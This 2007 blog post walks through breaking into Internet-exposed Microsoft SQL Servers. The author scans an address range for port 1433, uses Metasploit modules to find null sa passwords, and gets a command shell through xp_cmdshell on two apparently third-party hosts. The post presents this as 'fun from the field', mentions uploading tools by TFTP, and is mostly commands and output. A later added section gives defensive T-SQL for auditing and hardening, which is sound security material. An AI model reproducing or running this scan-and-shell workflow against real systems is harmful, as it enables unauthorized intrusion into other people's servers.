Sunday, September 9, 2007

old school 0wning MSSQL --fun from the field


rule #1 don't expose your database to the world

rule #2 don't have a null sa account, especially if you are violating rule #1...

let's see...

use unicornscan to search for open TCP port 1433

cg@segfault:~/evil/scanners/$ sudo unicornscan A.B.0.0/16:1433 -p

Open ms-sql-s[ 1433] From A.B.Z.25 ttl 107
Open ms-sql-s[ 1433] From A.B.X.28 ttl 107
Open ms-sql-s[ 1433] From A.B.C.30 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.34 ttl 108
Open ms-sql-s[ 1433] From A.B.Z.50 ttl 106
Open ms-sql-s[ 1433] From A.B.Z.58 ttl 44
Open ms-sql-s[ 1433] From A.B.Z.91 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.141 ttl 109
Open ms-sql-s[ 1433] From A.B.Z.156 ttl 107
Open ms-sql-s[ 1433] From A.B.Y.170 ttl 107
Open ms-sql-s[ 1433] From A.B.Z.184 ttl 108

run the hosts that responded through the msf auxiliary module mssql_ping to see if we can get any version information. I'll omit the ones that didn't respond.


cg@segfault:~/evil/msf3$ ./msfconsole

=[ msf v3.1-dev
+ -- --=[ 218 exploits - 107 payloads
+ -- --=[ 17 encoders - 5 nops
=[ 41 aux

msf > use auxiliary/scanner/mssql/mssql_
use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_ping
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > info

Name: MSSQL Ping Utility
Version: 4419

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for information.

msf auxiliary(mssql_ping) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.X.28:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = JADER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

msf auxiliary(mssql_ping) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.C.30:
[*] tcp = 1433
[*] np = \\ABC-SERVER\pipe\\sql\query
[*] Version = 8.00.194
[*] ServerName = DTI-SERVER
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed
msf auxiliary(mssql_ping) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_ping) > run
[*] SQL Server information for A.B.Y.170:
[*] tcp = 1433
[*] np = \\ABCDEF\pipe\sql\query
[*] Version = 8.00.194
[*] ServerName = SERVIDOR
[*] IsClustered = No
[*] InstanceName = MSSQLSERVER
[*] Auxiliary module execution completed

Now, let's run them through mssql_login to look for any that have null sa accounts.

msf > use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > info

Name: MSSQL Login Utility
Version: 4749

Provided by:
MC

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1433 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the MSSQL instance for a null SA account.

msf auxiliary(mssql_login) > set RHOSTS A.B.X.28
RHOSTS => A.B.X.28
msf auxiliary(mssql_login) > run
[*] Target A.B.X.28 DOES have a null sa account!
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.Y.170
RHOSTS => A.B.Y.170
msf auxiliary(mssql_login) > run
[*] Target A.B.Y.170 does not have a null sa account...
[*] Auxiliary module execution completed
msf auxiliary(mssql_login) > set RHOSTS A.B.C.30
RHOSTS => A.B.C.30
msf auxiliary(mssql_login) > run
[*] Target A.B.C.30 DOES have a null sa account!
[*] Auxiliary module execution completed

then let's use sqlcmd to see if we can get a command shell on the box. sqlcmd uses xp_cmdshell to execute commands.

cg@segfault:~/evil/db$ ./sqlcmd A.B.X.28:1433
connected to host A.B.X.28:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Conexão local:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador Ethernet Conexão de rede sem fio:
Estado da mídia . . . . . . . . . . . : mídia desconectada

Adaptador PPP POP:
Sufixo DNS específico de conexão. :
Endereço IP . . . . . . . . . . . . : A.B.X.28
Máscara de sub-rede . . . . . . . . : 255.255.255.255
Gateway padrão. . . . . . . . . . . : A.B.X.28

OR

cg@segfault:~/evil/db$ ./sqlcmd A.B.C.30:1433
connected to host A.B.C.30:1433 as user sa!
exit with CTRL+C

sqlcmd> ipconfig

Configuração de IP do Windows


Adaptador Ethernet Local:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.5
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . :

Adaptador Ethernet remoto:

Sufixo DNS específico de conexão . :
Endereço IP . . . . . . . . . . . . : 192.168.2.6
Máscara de sub-rede . . . . . . . . : 255.255.255.0
Gateway padrão. . . . . . . . . . . : 192.168.2.1

TFTP was available on both boxes for some old school year-2000 "tftp upload your tools" fun.
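If you run SQL Server yourself, the two rules at the top of the post boil down to a short audit: does sa accept a blank password, and is xp_cmdshell turned on. The T-SQL below is an added example, not from the original post or from the tools it links. It assumes SQL Server 2005 or later, where `sys.sql_logins` and `sys.configurations` exist (the boxes in the post report 8.00.194, which is SQL Server 2000 RTM and predates those views), and the password in the last step is a placeholder you must replace.

```sql
-- Added audit/hardening script (not from the original post).
-- Assumes SQL Server 2005 or later; run it as a sysadmin against master.

-- 1. Does the sa login accept a blank password?
--    Match on sid 0x01 rather than the name, so a renamed sa is still found.
SELECT name,
       is_disabled,
       PWDCOMPARE(N'', password_hash) AS accepts_blank_password   -- 1 = blank password works
FROM sys.sql_logins
WHERE sid = 0x01;

-- 2. Any other SQL login with a blank password, or a password equal to its login name?
SELECT name
FROM sys.sql_logins
WHERE PWDCOMPARE(N'', password_hash) = 1
   OR PWDCOMPARE(name, password_hash) = 1;

-- 3. Is xp_cmdshell enabled?  value_in_use: 0 = disabled, 1 = enabled
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';

-- 4. Remediate: give sa a real password, disable the login, and turn xp_cmdshell off.
ALTER LOGIN sa WITH PASSWORD = N'<replace-with-a-long-random-password>';  -- placeholder
ALTER LOGIN sa DISABLE;

EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'xp_cmdshell', 0;
RECONFIGURE;
```

Step 1 is the server-side equivalent of what mssql_login tested from the outside; step 3 is what made the sqlcmd shell possible. None of this replaces rule #1: keep TCP 1433 off the Internet at the firewall, because a blank password or an enabled xp_cmdshell only matters to whoever can reach the port.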

Links:
MSSQL Version chart: http://www.sqlteam.com/article/sql-server-versions

sqlcmd.c: http://excluded.wgv.at/codedstuff.php

metasploit (like you need the link): http://framework.metasploit.com/

-CG

2 comments:

Anonymous said...

honey pots?

CG said...

perhaps...

In this day and age you can probably assume that if you got in with some old school exploit it is probably a honeypot.